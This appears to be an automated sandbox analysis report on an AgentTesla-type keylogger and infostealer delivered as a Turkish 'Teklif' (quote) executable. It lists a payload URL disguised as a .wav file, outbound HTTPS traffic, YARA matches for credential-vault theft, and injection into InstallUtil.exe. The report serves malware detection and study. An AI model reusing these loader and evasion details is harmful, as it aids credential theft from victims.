                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2206832205.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000004.00000002.2446673623.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000005.00000002.2532866894.00000000028DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wymascensores.com
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2206832205.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000004.00000002.2446673623.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000005.00000002.2532866894.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wymascensores.com/img/Tcghz.wav
                      Source: Teklif-6205018797-6100052155-UUE.exe, Ptqlzgvzpfa.exe.0.drString found in binary or memory: https://wymascensores.com/img/Tcghz.wav7__AsyncLocalScope_Current__
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52077
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52073
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52073 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52077 -> 443
                      Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.5:49704 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.5:52073 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.5:52077 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to log keystrokes (.Net Source)
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.raw.unpack, SKTzxzsJw.cs.Net Code: RePIUNFdBeM

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: 2.2.InstallUtil.exe.360000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 2.2.InstallUtil.exe.360000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_0598DCC8 NtProtectVirtualMemory,0_2_0598DCC8
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_0598F200 NtResumeThread,0_2_0598F200
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_0598F1AF NtResumeThread,0_2_0598F1AF
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_0598F1F9 NtResumeThread,0_2_0598F1F9
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_0598DCC0 NtProtectVirtualMemory,0_2_0598DCC0
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_0647F200 NtResumeThread,4_2_0647F200
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_0647DCC8 NtProtectVirtualMemory,4_2_0647DCC8
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_0647DCC0 NtProtectVirtualMemory,4_2_0647DCC0
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_0647F1F9 NtResumeThread,4_2_0647F1F9
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_0647F1AF NtResumeThread,4_2_0647F1AF
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05D5DCC8 NtProtectVirtualMemory,5_2_05D5DCC8
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05D5F200 NtResumeThread,5_2_05D5F200
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05D5DCC0 NtProtectVirtualMemory,5_2_05D5DCC0
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05D5F1F9 NtResumeThread,5_2_05D5F1F9
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05D5F1AF NtResumeThread,5_2_05D5F1AF
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_0079A9C00_2_0079A9C0
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_007967A00_2_007967A0
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_007967910_2_00796791
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_058567C00_2_058567C0
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_0585673F0_2_0585673F
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_05855AD00_2_05855AD0
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_0585EAF00_2_0585EAF0
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_0585F9880_2_0585F988
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_05856D190_2_05856D19
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_058500070_2_05850007
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_05855C300_2_05855C30
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_058500400_2_05850040
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_058567B00_2_058567B0
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_058553180_2_05855318
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_058553280_2_05855328
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_05855AC00_2_05855AC0
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_059357500_2_05935750
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_059321400_2_05932140
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_059324670_2_05932467
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_059333480_2_05933348
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_059608C00_2_059608C0
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_0596ED890_2_0596ED89
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_0596EDD00_2_0596EDD0
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_0596EDC00_2_0596EDC0
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_059625400_2_05962540
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_05967D780_2_05967D78
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_05967D6A0_2_05967D6A
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_0596E8100_2_0596E810
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_0596E8000_2_0596E800
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_059821980_2_05982198
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_0598AA980_2_0598AA98
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_05988A880_2_05988A88
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_0598DA200_2_0598DA20
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_05989F580_2_05989F58
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_05989F680_2_05989F68
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_0598AA880_2_0598AA88
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_0598DA100_2_0598DA10
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_05988A780_2_05988A78
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_05A000060_2_05A00006
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_05A000400_2_05A00040
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_05A0EB580_2_05A0EB58
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_05C8DE500_2_05C8DE50
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_05C8D1680_2_05C8D168
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_05C700400_2_05C70040
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_05C7003B0_2_05C7003B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_024293F82_2_024293F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_02424A602_2_02424A60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_02423E482_2_02423E48
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0242CF282_2_0242CF28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_02429C702_2_02429C70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_024241902_2_02424190
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05C056B02_2_05C056B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05C000402_2_05C00040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05C0BCC82_2_05C0BCC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05C0DC082_2_05C0DC08
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05C03F282_2_05C03F28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05C08B682_2_05C08B68
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05C02AE82_2_05C02AE8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05C09AA02_2_05C09AA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05C032302_2_05C03230
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05C04FD02_2_05C04FD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_02429C682_2_02429C68
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_0130A9C04_2_0130A9C0
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_013067A04_2_013067A0
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_013067914_2_01306791
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_0634EAF04_2_0634EAF0
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_06345AD04_2_06345AD0
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_063467C04_2_063467C0
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_06341EBD4_2_06341EBD
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_06345AC04_2_06345AC0
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_063453284_2_06345328
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_063453184_2_06345318
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_063467B04_2_063467B0
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_06345C304_2_06345C30
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_063400064_2_06340006
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_063400404_2_06340040
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_06346D1A4_2_06346D1A
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_0634F9884_2_0634F988
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_064257504_2_06425750
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_064221404_2_06422140
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_064224674_2_06422467
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_064233484_2_06423348
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_064508C04_2_064508C0
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_0645DF494_2_0645DF49
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_0645DF584_2_0645DF58
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_0645D9794_2_0645D979
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_0645D9884_2_0645D988
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_0647DA204_2_0647DA20
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_06478A884_2_06478A88
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_0647AA984_2_0647AA98
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_064723D84_2_064723D8
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_06478A784_2_06478A78
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_0647DA1E4_2_0647DA1E
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_0647AA884_2_0647AA88
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_06479F584_2_06479F58
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_06479F684_2_06479F68
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_0647DCC04_2_0647DCC0
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_064FEB584_2_064FEB58
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_064F00404_2_064F0040
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_064F00064_2_064F0006
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_0677DE504_2_0677DE50
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_067600404_2_06760040
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_067600394_2_06760039
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_0677D1684_2_0677D168
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_00D6A9C05_2_00D6A9C0
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_00D667915_2_00D66791
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_00D667A05_2_00D667A0
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05C2F1935_2_05C2F193
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05C267C05_2_05C267C0
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05C25AD05_2_05C25AD0
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05C2EAF05_2_05C2EAF0
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05C2F9885_2_05C2F988
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05C26D1A5_2_05C26D1A
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05C200405_2_05C20040
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05C2001C5_2_05C2001C
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05C25C305_2_05C25C30
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05C267B05_2_05C267B0
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05C253185_2_05C25318
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05C253285_2_05C25328
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05C25AC05_2_05C25AC0
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05C2EAE05_2_05C2EAE0
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05D021375_2_05D02137
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05D024675_2_05D02467
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05D033485_2_05D03348
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05D308C05_2_05D308C0
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05D325405_2_05D32540
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05D3DF585_2_05D3DF58
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05D3DF495_2_05D3DF49
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05D3D9885_2_05D3D988
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05D3D9795_2_05D3D979
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05D523D85_2_05D523D8
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05D5AA985_2_05D5AA98
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05D58A885_2_05D58A88
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05D5DA205_2_05D5DA20
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05D59F585_2_05D59F58
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05D59F685_2_05D59F68
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05D5D9C05_2_05D5D9C0
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05D5AA885_2_05D5AA88
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05D58A785_2_05D58A78
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05D5DA105_2_05D5DA10
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05DD00405_2_05DD0040
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05DD00075_2_05DD0007
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05DDEB585_2_05DDEB58
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_0605DE505_2_0605DE50
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_0604001E5_2_0604001E
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_060400405_2_06040040
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_0605D1685_2_0605D168
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00F64A606_2_00F64A60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00F69C686_2_00F69C68
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00F63E486_2_00F63E48
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00F6CF286_2_00F6CF28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00F641906_2_00F64190
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00F641846_2_00F64184
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00F64A566_2_00F64A56
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00F63E3C6_2_00F63E3C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0584AD806_2_0584AD80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_058495346_2_05849534
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_00F64A608_2_00F64A60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_00F69C628_2_00F69C62
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_00F63E488_2_00F63E48
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_00F6CF288_2_00F6CF28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_00F641908_2_00F64190
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2206832205.00000000027FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2206832205.00000000027FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQhezbmbyba.exe6 vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2206321146.00000000007EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2231386513.00000000058D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2206832205.000000000251E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.0000000003F03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000035BF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2229849429.0000000005636000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQhezbmbyba.exe6 vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000000.2070509321.00000000000DA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameQhezbmbyba.exe6 vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.0000000003549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2206832205.00000000028BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000034F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000036D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLhnqc.dll" vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000036D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.000000000366C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLhnqc.dll" vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2232534783.0000000005A10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2230379954.00000000056B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameLhnqc.dll" vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exeBinary or memory string: OriginalFilenameQhezbmbyba.exe6 vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
